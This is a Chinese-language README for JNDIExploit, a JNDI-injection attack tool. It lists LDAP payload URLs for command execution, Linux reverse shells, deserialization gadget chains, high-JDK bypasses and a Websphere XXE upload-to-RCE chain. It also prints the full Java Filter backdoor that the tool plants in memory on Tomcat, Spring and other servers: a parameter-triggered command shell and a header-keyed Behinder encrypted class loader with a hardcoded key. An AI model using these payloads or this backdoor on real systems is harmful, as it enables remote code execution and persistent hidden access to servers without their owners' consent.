一款用于 JNDI注入 利用的工具,大量参考/引用了 Rogue JNDI 项目的代码,支持直接植入内存shell,并集成了常见的bypass 高版本JDK的方式,适用于与自动化工具配合使用。
使用 java -jar JNDIExploit.jar -h 查看参数说明,其中 --ip 参数为必选参数
Usage: java -jar JNDIExploit.jar [options] Options: * -i, --ip Local ip address -l, --ldapPort Ldap bind port (default: 1389) -p, --httpPort Http bind port (default: 8080) -u, --usage Show usage (default: false) -h, --help Show this help 使用 java -jar JNDIExploit.jar -u 查看支持的 LDAP 格式
Supported LADP Queries * all words are case INSENSITIVE when send to ldap server [+] Basic Queries: ldap://127.0.0.1:1389/Basic/[PayloadType]/[Params], e.g. ldap://127.0.0.1:1389/Basic/Dnslog/[domain] ldap://127.0.0.1:1389/Basic/Command/[cmd] ldap://127.0.0.1:1389/Basic/Command/Base64/[base64_encoded_cmd] ldap://127.0.0.1:1389/Basic/ReverseShell/[ip]/[port] ---windows NOT supported ldap://127.0.0.1:1389/Basic/TomcatMemshell ldap://127.0.0.1:1389/Basic/JettyMemshell ldap://127.0.0.1:1389/Basic/WeblogicMemshell ldap://127.0.0.1:1389/Basic/JBossMemshell ldap://127.0.0.1:1389/Basic/WebsphereMemshell ldap://127.0.0.1:1389/Basic/SpringMemshell [+] Deserialize Queries: ldap://127.0.0.1:1389/Deserialize/[GadgetType]/[PayloadType]/[Params], e.g. ldap://127.0.0.1:1389/Deserialize/URLDNS/[domain] ldap://127.0.0.1:1389/Deserialize/CommonsCollections1/Dnslog/[domain] ldap://127.0.0.1:1389/Deserialize/CommonsCollections2/Command/[cmd] ldap://127.0.0.1:1389/Deserialize/CommonsBeanutils1/Command/Base64/[base64_encoded_cmd] ldap://127.0.0.1:1389/Deserialize/C3P0/ReverseShell/[ip]/[port] ---windows NOT supported ldap://127.0.0.1:1389/Deserialize/Jre8u20/TomcatMemshell ---ALSO support other memshells [+] TomcatBypass Queries ldap://127.0.0.1:1389/TomcatBypass/Dnslog/[domain] ldap://127.0.0.1:1389/TomcatBypass/Command/[cmd] ldap://127.0.0.1:1389/TomcatBypass/Command/Base64/[base64_encoded_cmd] ldap://127.0.0.1:1389/TomcatBypass/ReverseShell/[ip]/[port] ---windows NOT supported ldap://127.0.0.1:1389/TomcatBypass/TomcatMemshell ldap://127.0.0.1:1389/TomcatBypass/SpringMemshell [+] GroovyBypass Queries ldap://127.0.0.1:1389/GroovyBypass/Command/[cmd] ldap://127.0.0.1:1389/GroovyBypass/Command/Base64/[base64_encoded_cmd] [+] WebsphereBypass Queries ldap://127.0.0.1:1389/WebsphereBypass/List/file=[file or directory] ldap://127.0.0.1:1389/WebsphereBypass/Upload/Dnslog/[domain] ldap://127.0.0.1:1389/WebsphereBypass/Upload/Command/[cmd] ldap://127.0.0.1:1389/WebsphereBypass/Upload/Command/Base64/[base64_encoded_cmd] ldap://127.0.0.1:1389/WebsphereBypass/Upload/ReverseShell/[ip]/[port] ---windows NOT supported ldap://127.0.0.1:1389/WebsphereBypass/Upload/WebsphereMemshell ldap://127.0.0.1:1389/WebsphereBypass/RCE/path=[uploaded_jar_path] ----e.g: ../../../../../tmp/jar_cache7808167489549525095.tmp - 目前支持的所有
PayloadType为Dnslog: 用于产生一个DNS请求,与DNSLog平台配合使用,对Linux/Windows进行了简单的适配Command: 用于执行命令,如果命令有特殊字符,支持对命令进行Base64编码后传输ReverseShell: 用于Linux系统的反弹shell,方便使用TomcatMemshell: 用于植入Tomcat内存shell, 支持Behinder shell与Basic cmd shellSpringMemshell: 用于植入Spring内存shell, 支持Behinder shell与Basic cmd shellWeblogicMemshell: 用于植入Weblogic内存shell, 支持Behinder shell与Basic cmd shellJettyMemshell: 用于植入Jetty内存shell, 支持Behinder shell与Basic cmd shellJBossMemshell: 用于植入JBoss内存shell, 支持Behinder shell与Basic cmd shellWebsphereMemshell: 用于植入Websphere内存shell, 支持Behinder shell与Basic cmd shell
- 目前支持的所有
GadgetType为URLDNSCommonsBeanutis1CommonsCollections1CommonsCollections2C3P0Jre8u20
WebsphereBypass中的 3 个动作:list:基于XXE查看目标服务器上的目录或文件内容upload:基于XXE的jar协议将恶意jar包上传至目标服务器的临时目录rce:加载已上传至目标服务器临时目录的jar包,从而达到远程代码执行的效果(这一步本地未复现成功,抛java.lang.IllegalStateException: For application client runtime, the client factory execute on a managed server thread is not allowed.异常,有复现成功的小伙伴麻烦指导下)
- 采用动态添加
Filter/Controller的方式,并将添加的Filter移动至FilterChain的第一位 内存shell的兼容性测试结果请参考 memshell 项目Basic cmd shell的访问方式为/anything?type=basic&pass=[cmd]Behinder shell的访问方式需要修改冰蝎客户端(请参考 冰蝎改造之适配基于tomcat Filter的无文件webshell 的方式二自行修改),并在访问时需要添加X-Options-Ai头部,密码为rebeyond
植入的 Filter 代码如下:
public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException { System.out.println("[+] Dynamic Filter says hello"); String k; Cipher cipher; if (servletRequest.getParameter("type") != null && servletRequest.getParameter("type").equals("basic")) { k = servletRequest.getParameter("pass"); if (k != null && !k.isEmpty()) { cipher = null; String[] cmds; if (File.separator.equals("/")) { cmds = new String[]{"/bin/sh", "-c", k}; } else { cmds = new String[]{"cmd", "/C", k}; } String result = (new Scanner(Runtime.getRuntime().exec(cmds).getInputStream())).useDelimiter("\\A").next(); servletResponse.getWriter().println(result); } } else if (((HttpServletRequest)servletRequest).getHeader("X-Options-Ai") != null) { try { if (((HttpServletRequest)servletRequest).getMethod().equals("POST")) { k = "e45e329feb5d925b"; ((HttpServletRequest)servletRequest).getSession().setAttribute("u", k); cipher = Cipher.getInstance("AES"); cipher.init(2, new SecretKeySpec((((HttpServletRequest)servletRequest).getSession().getAttribute("u") + "").getBytes(), "AES")); byte[] evilClassBytes = cipher.doFinal((new BASE64Decoder()).decodeBuffer(servletRequest.getReader().readLine())); Class evilClass = (Class)this.myClassLoaderClazz.getDeclaredMethod("defineClass", byte[].class, ClassLoader.class).invoke((Object)null, evilClassBytes, Thread.currentThread().getContextClassLoader()); Object evilObject = evilClass.newInstance(); Method targetMethod = evilClass.getDeclaredMethod("equals", ServletRequest.class, ServletResponse.class); targetMethod.invoke(evilObject, servletRequest, servletResponse); } } catch (Exception var10) { var10.printStackTrace(); } } else { filterChain.doFilter(servletRequest, servletResponse); } }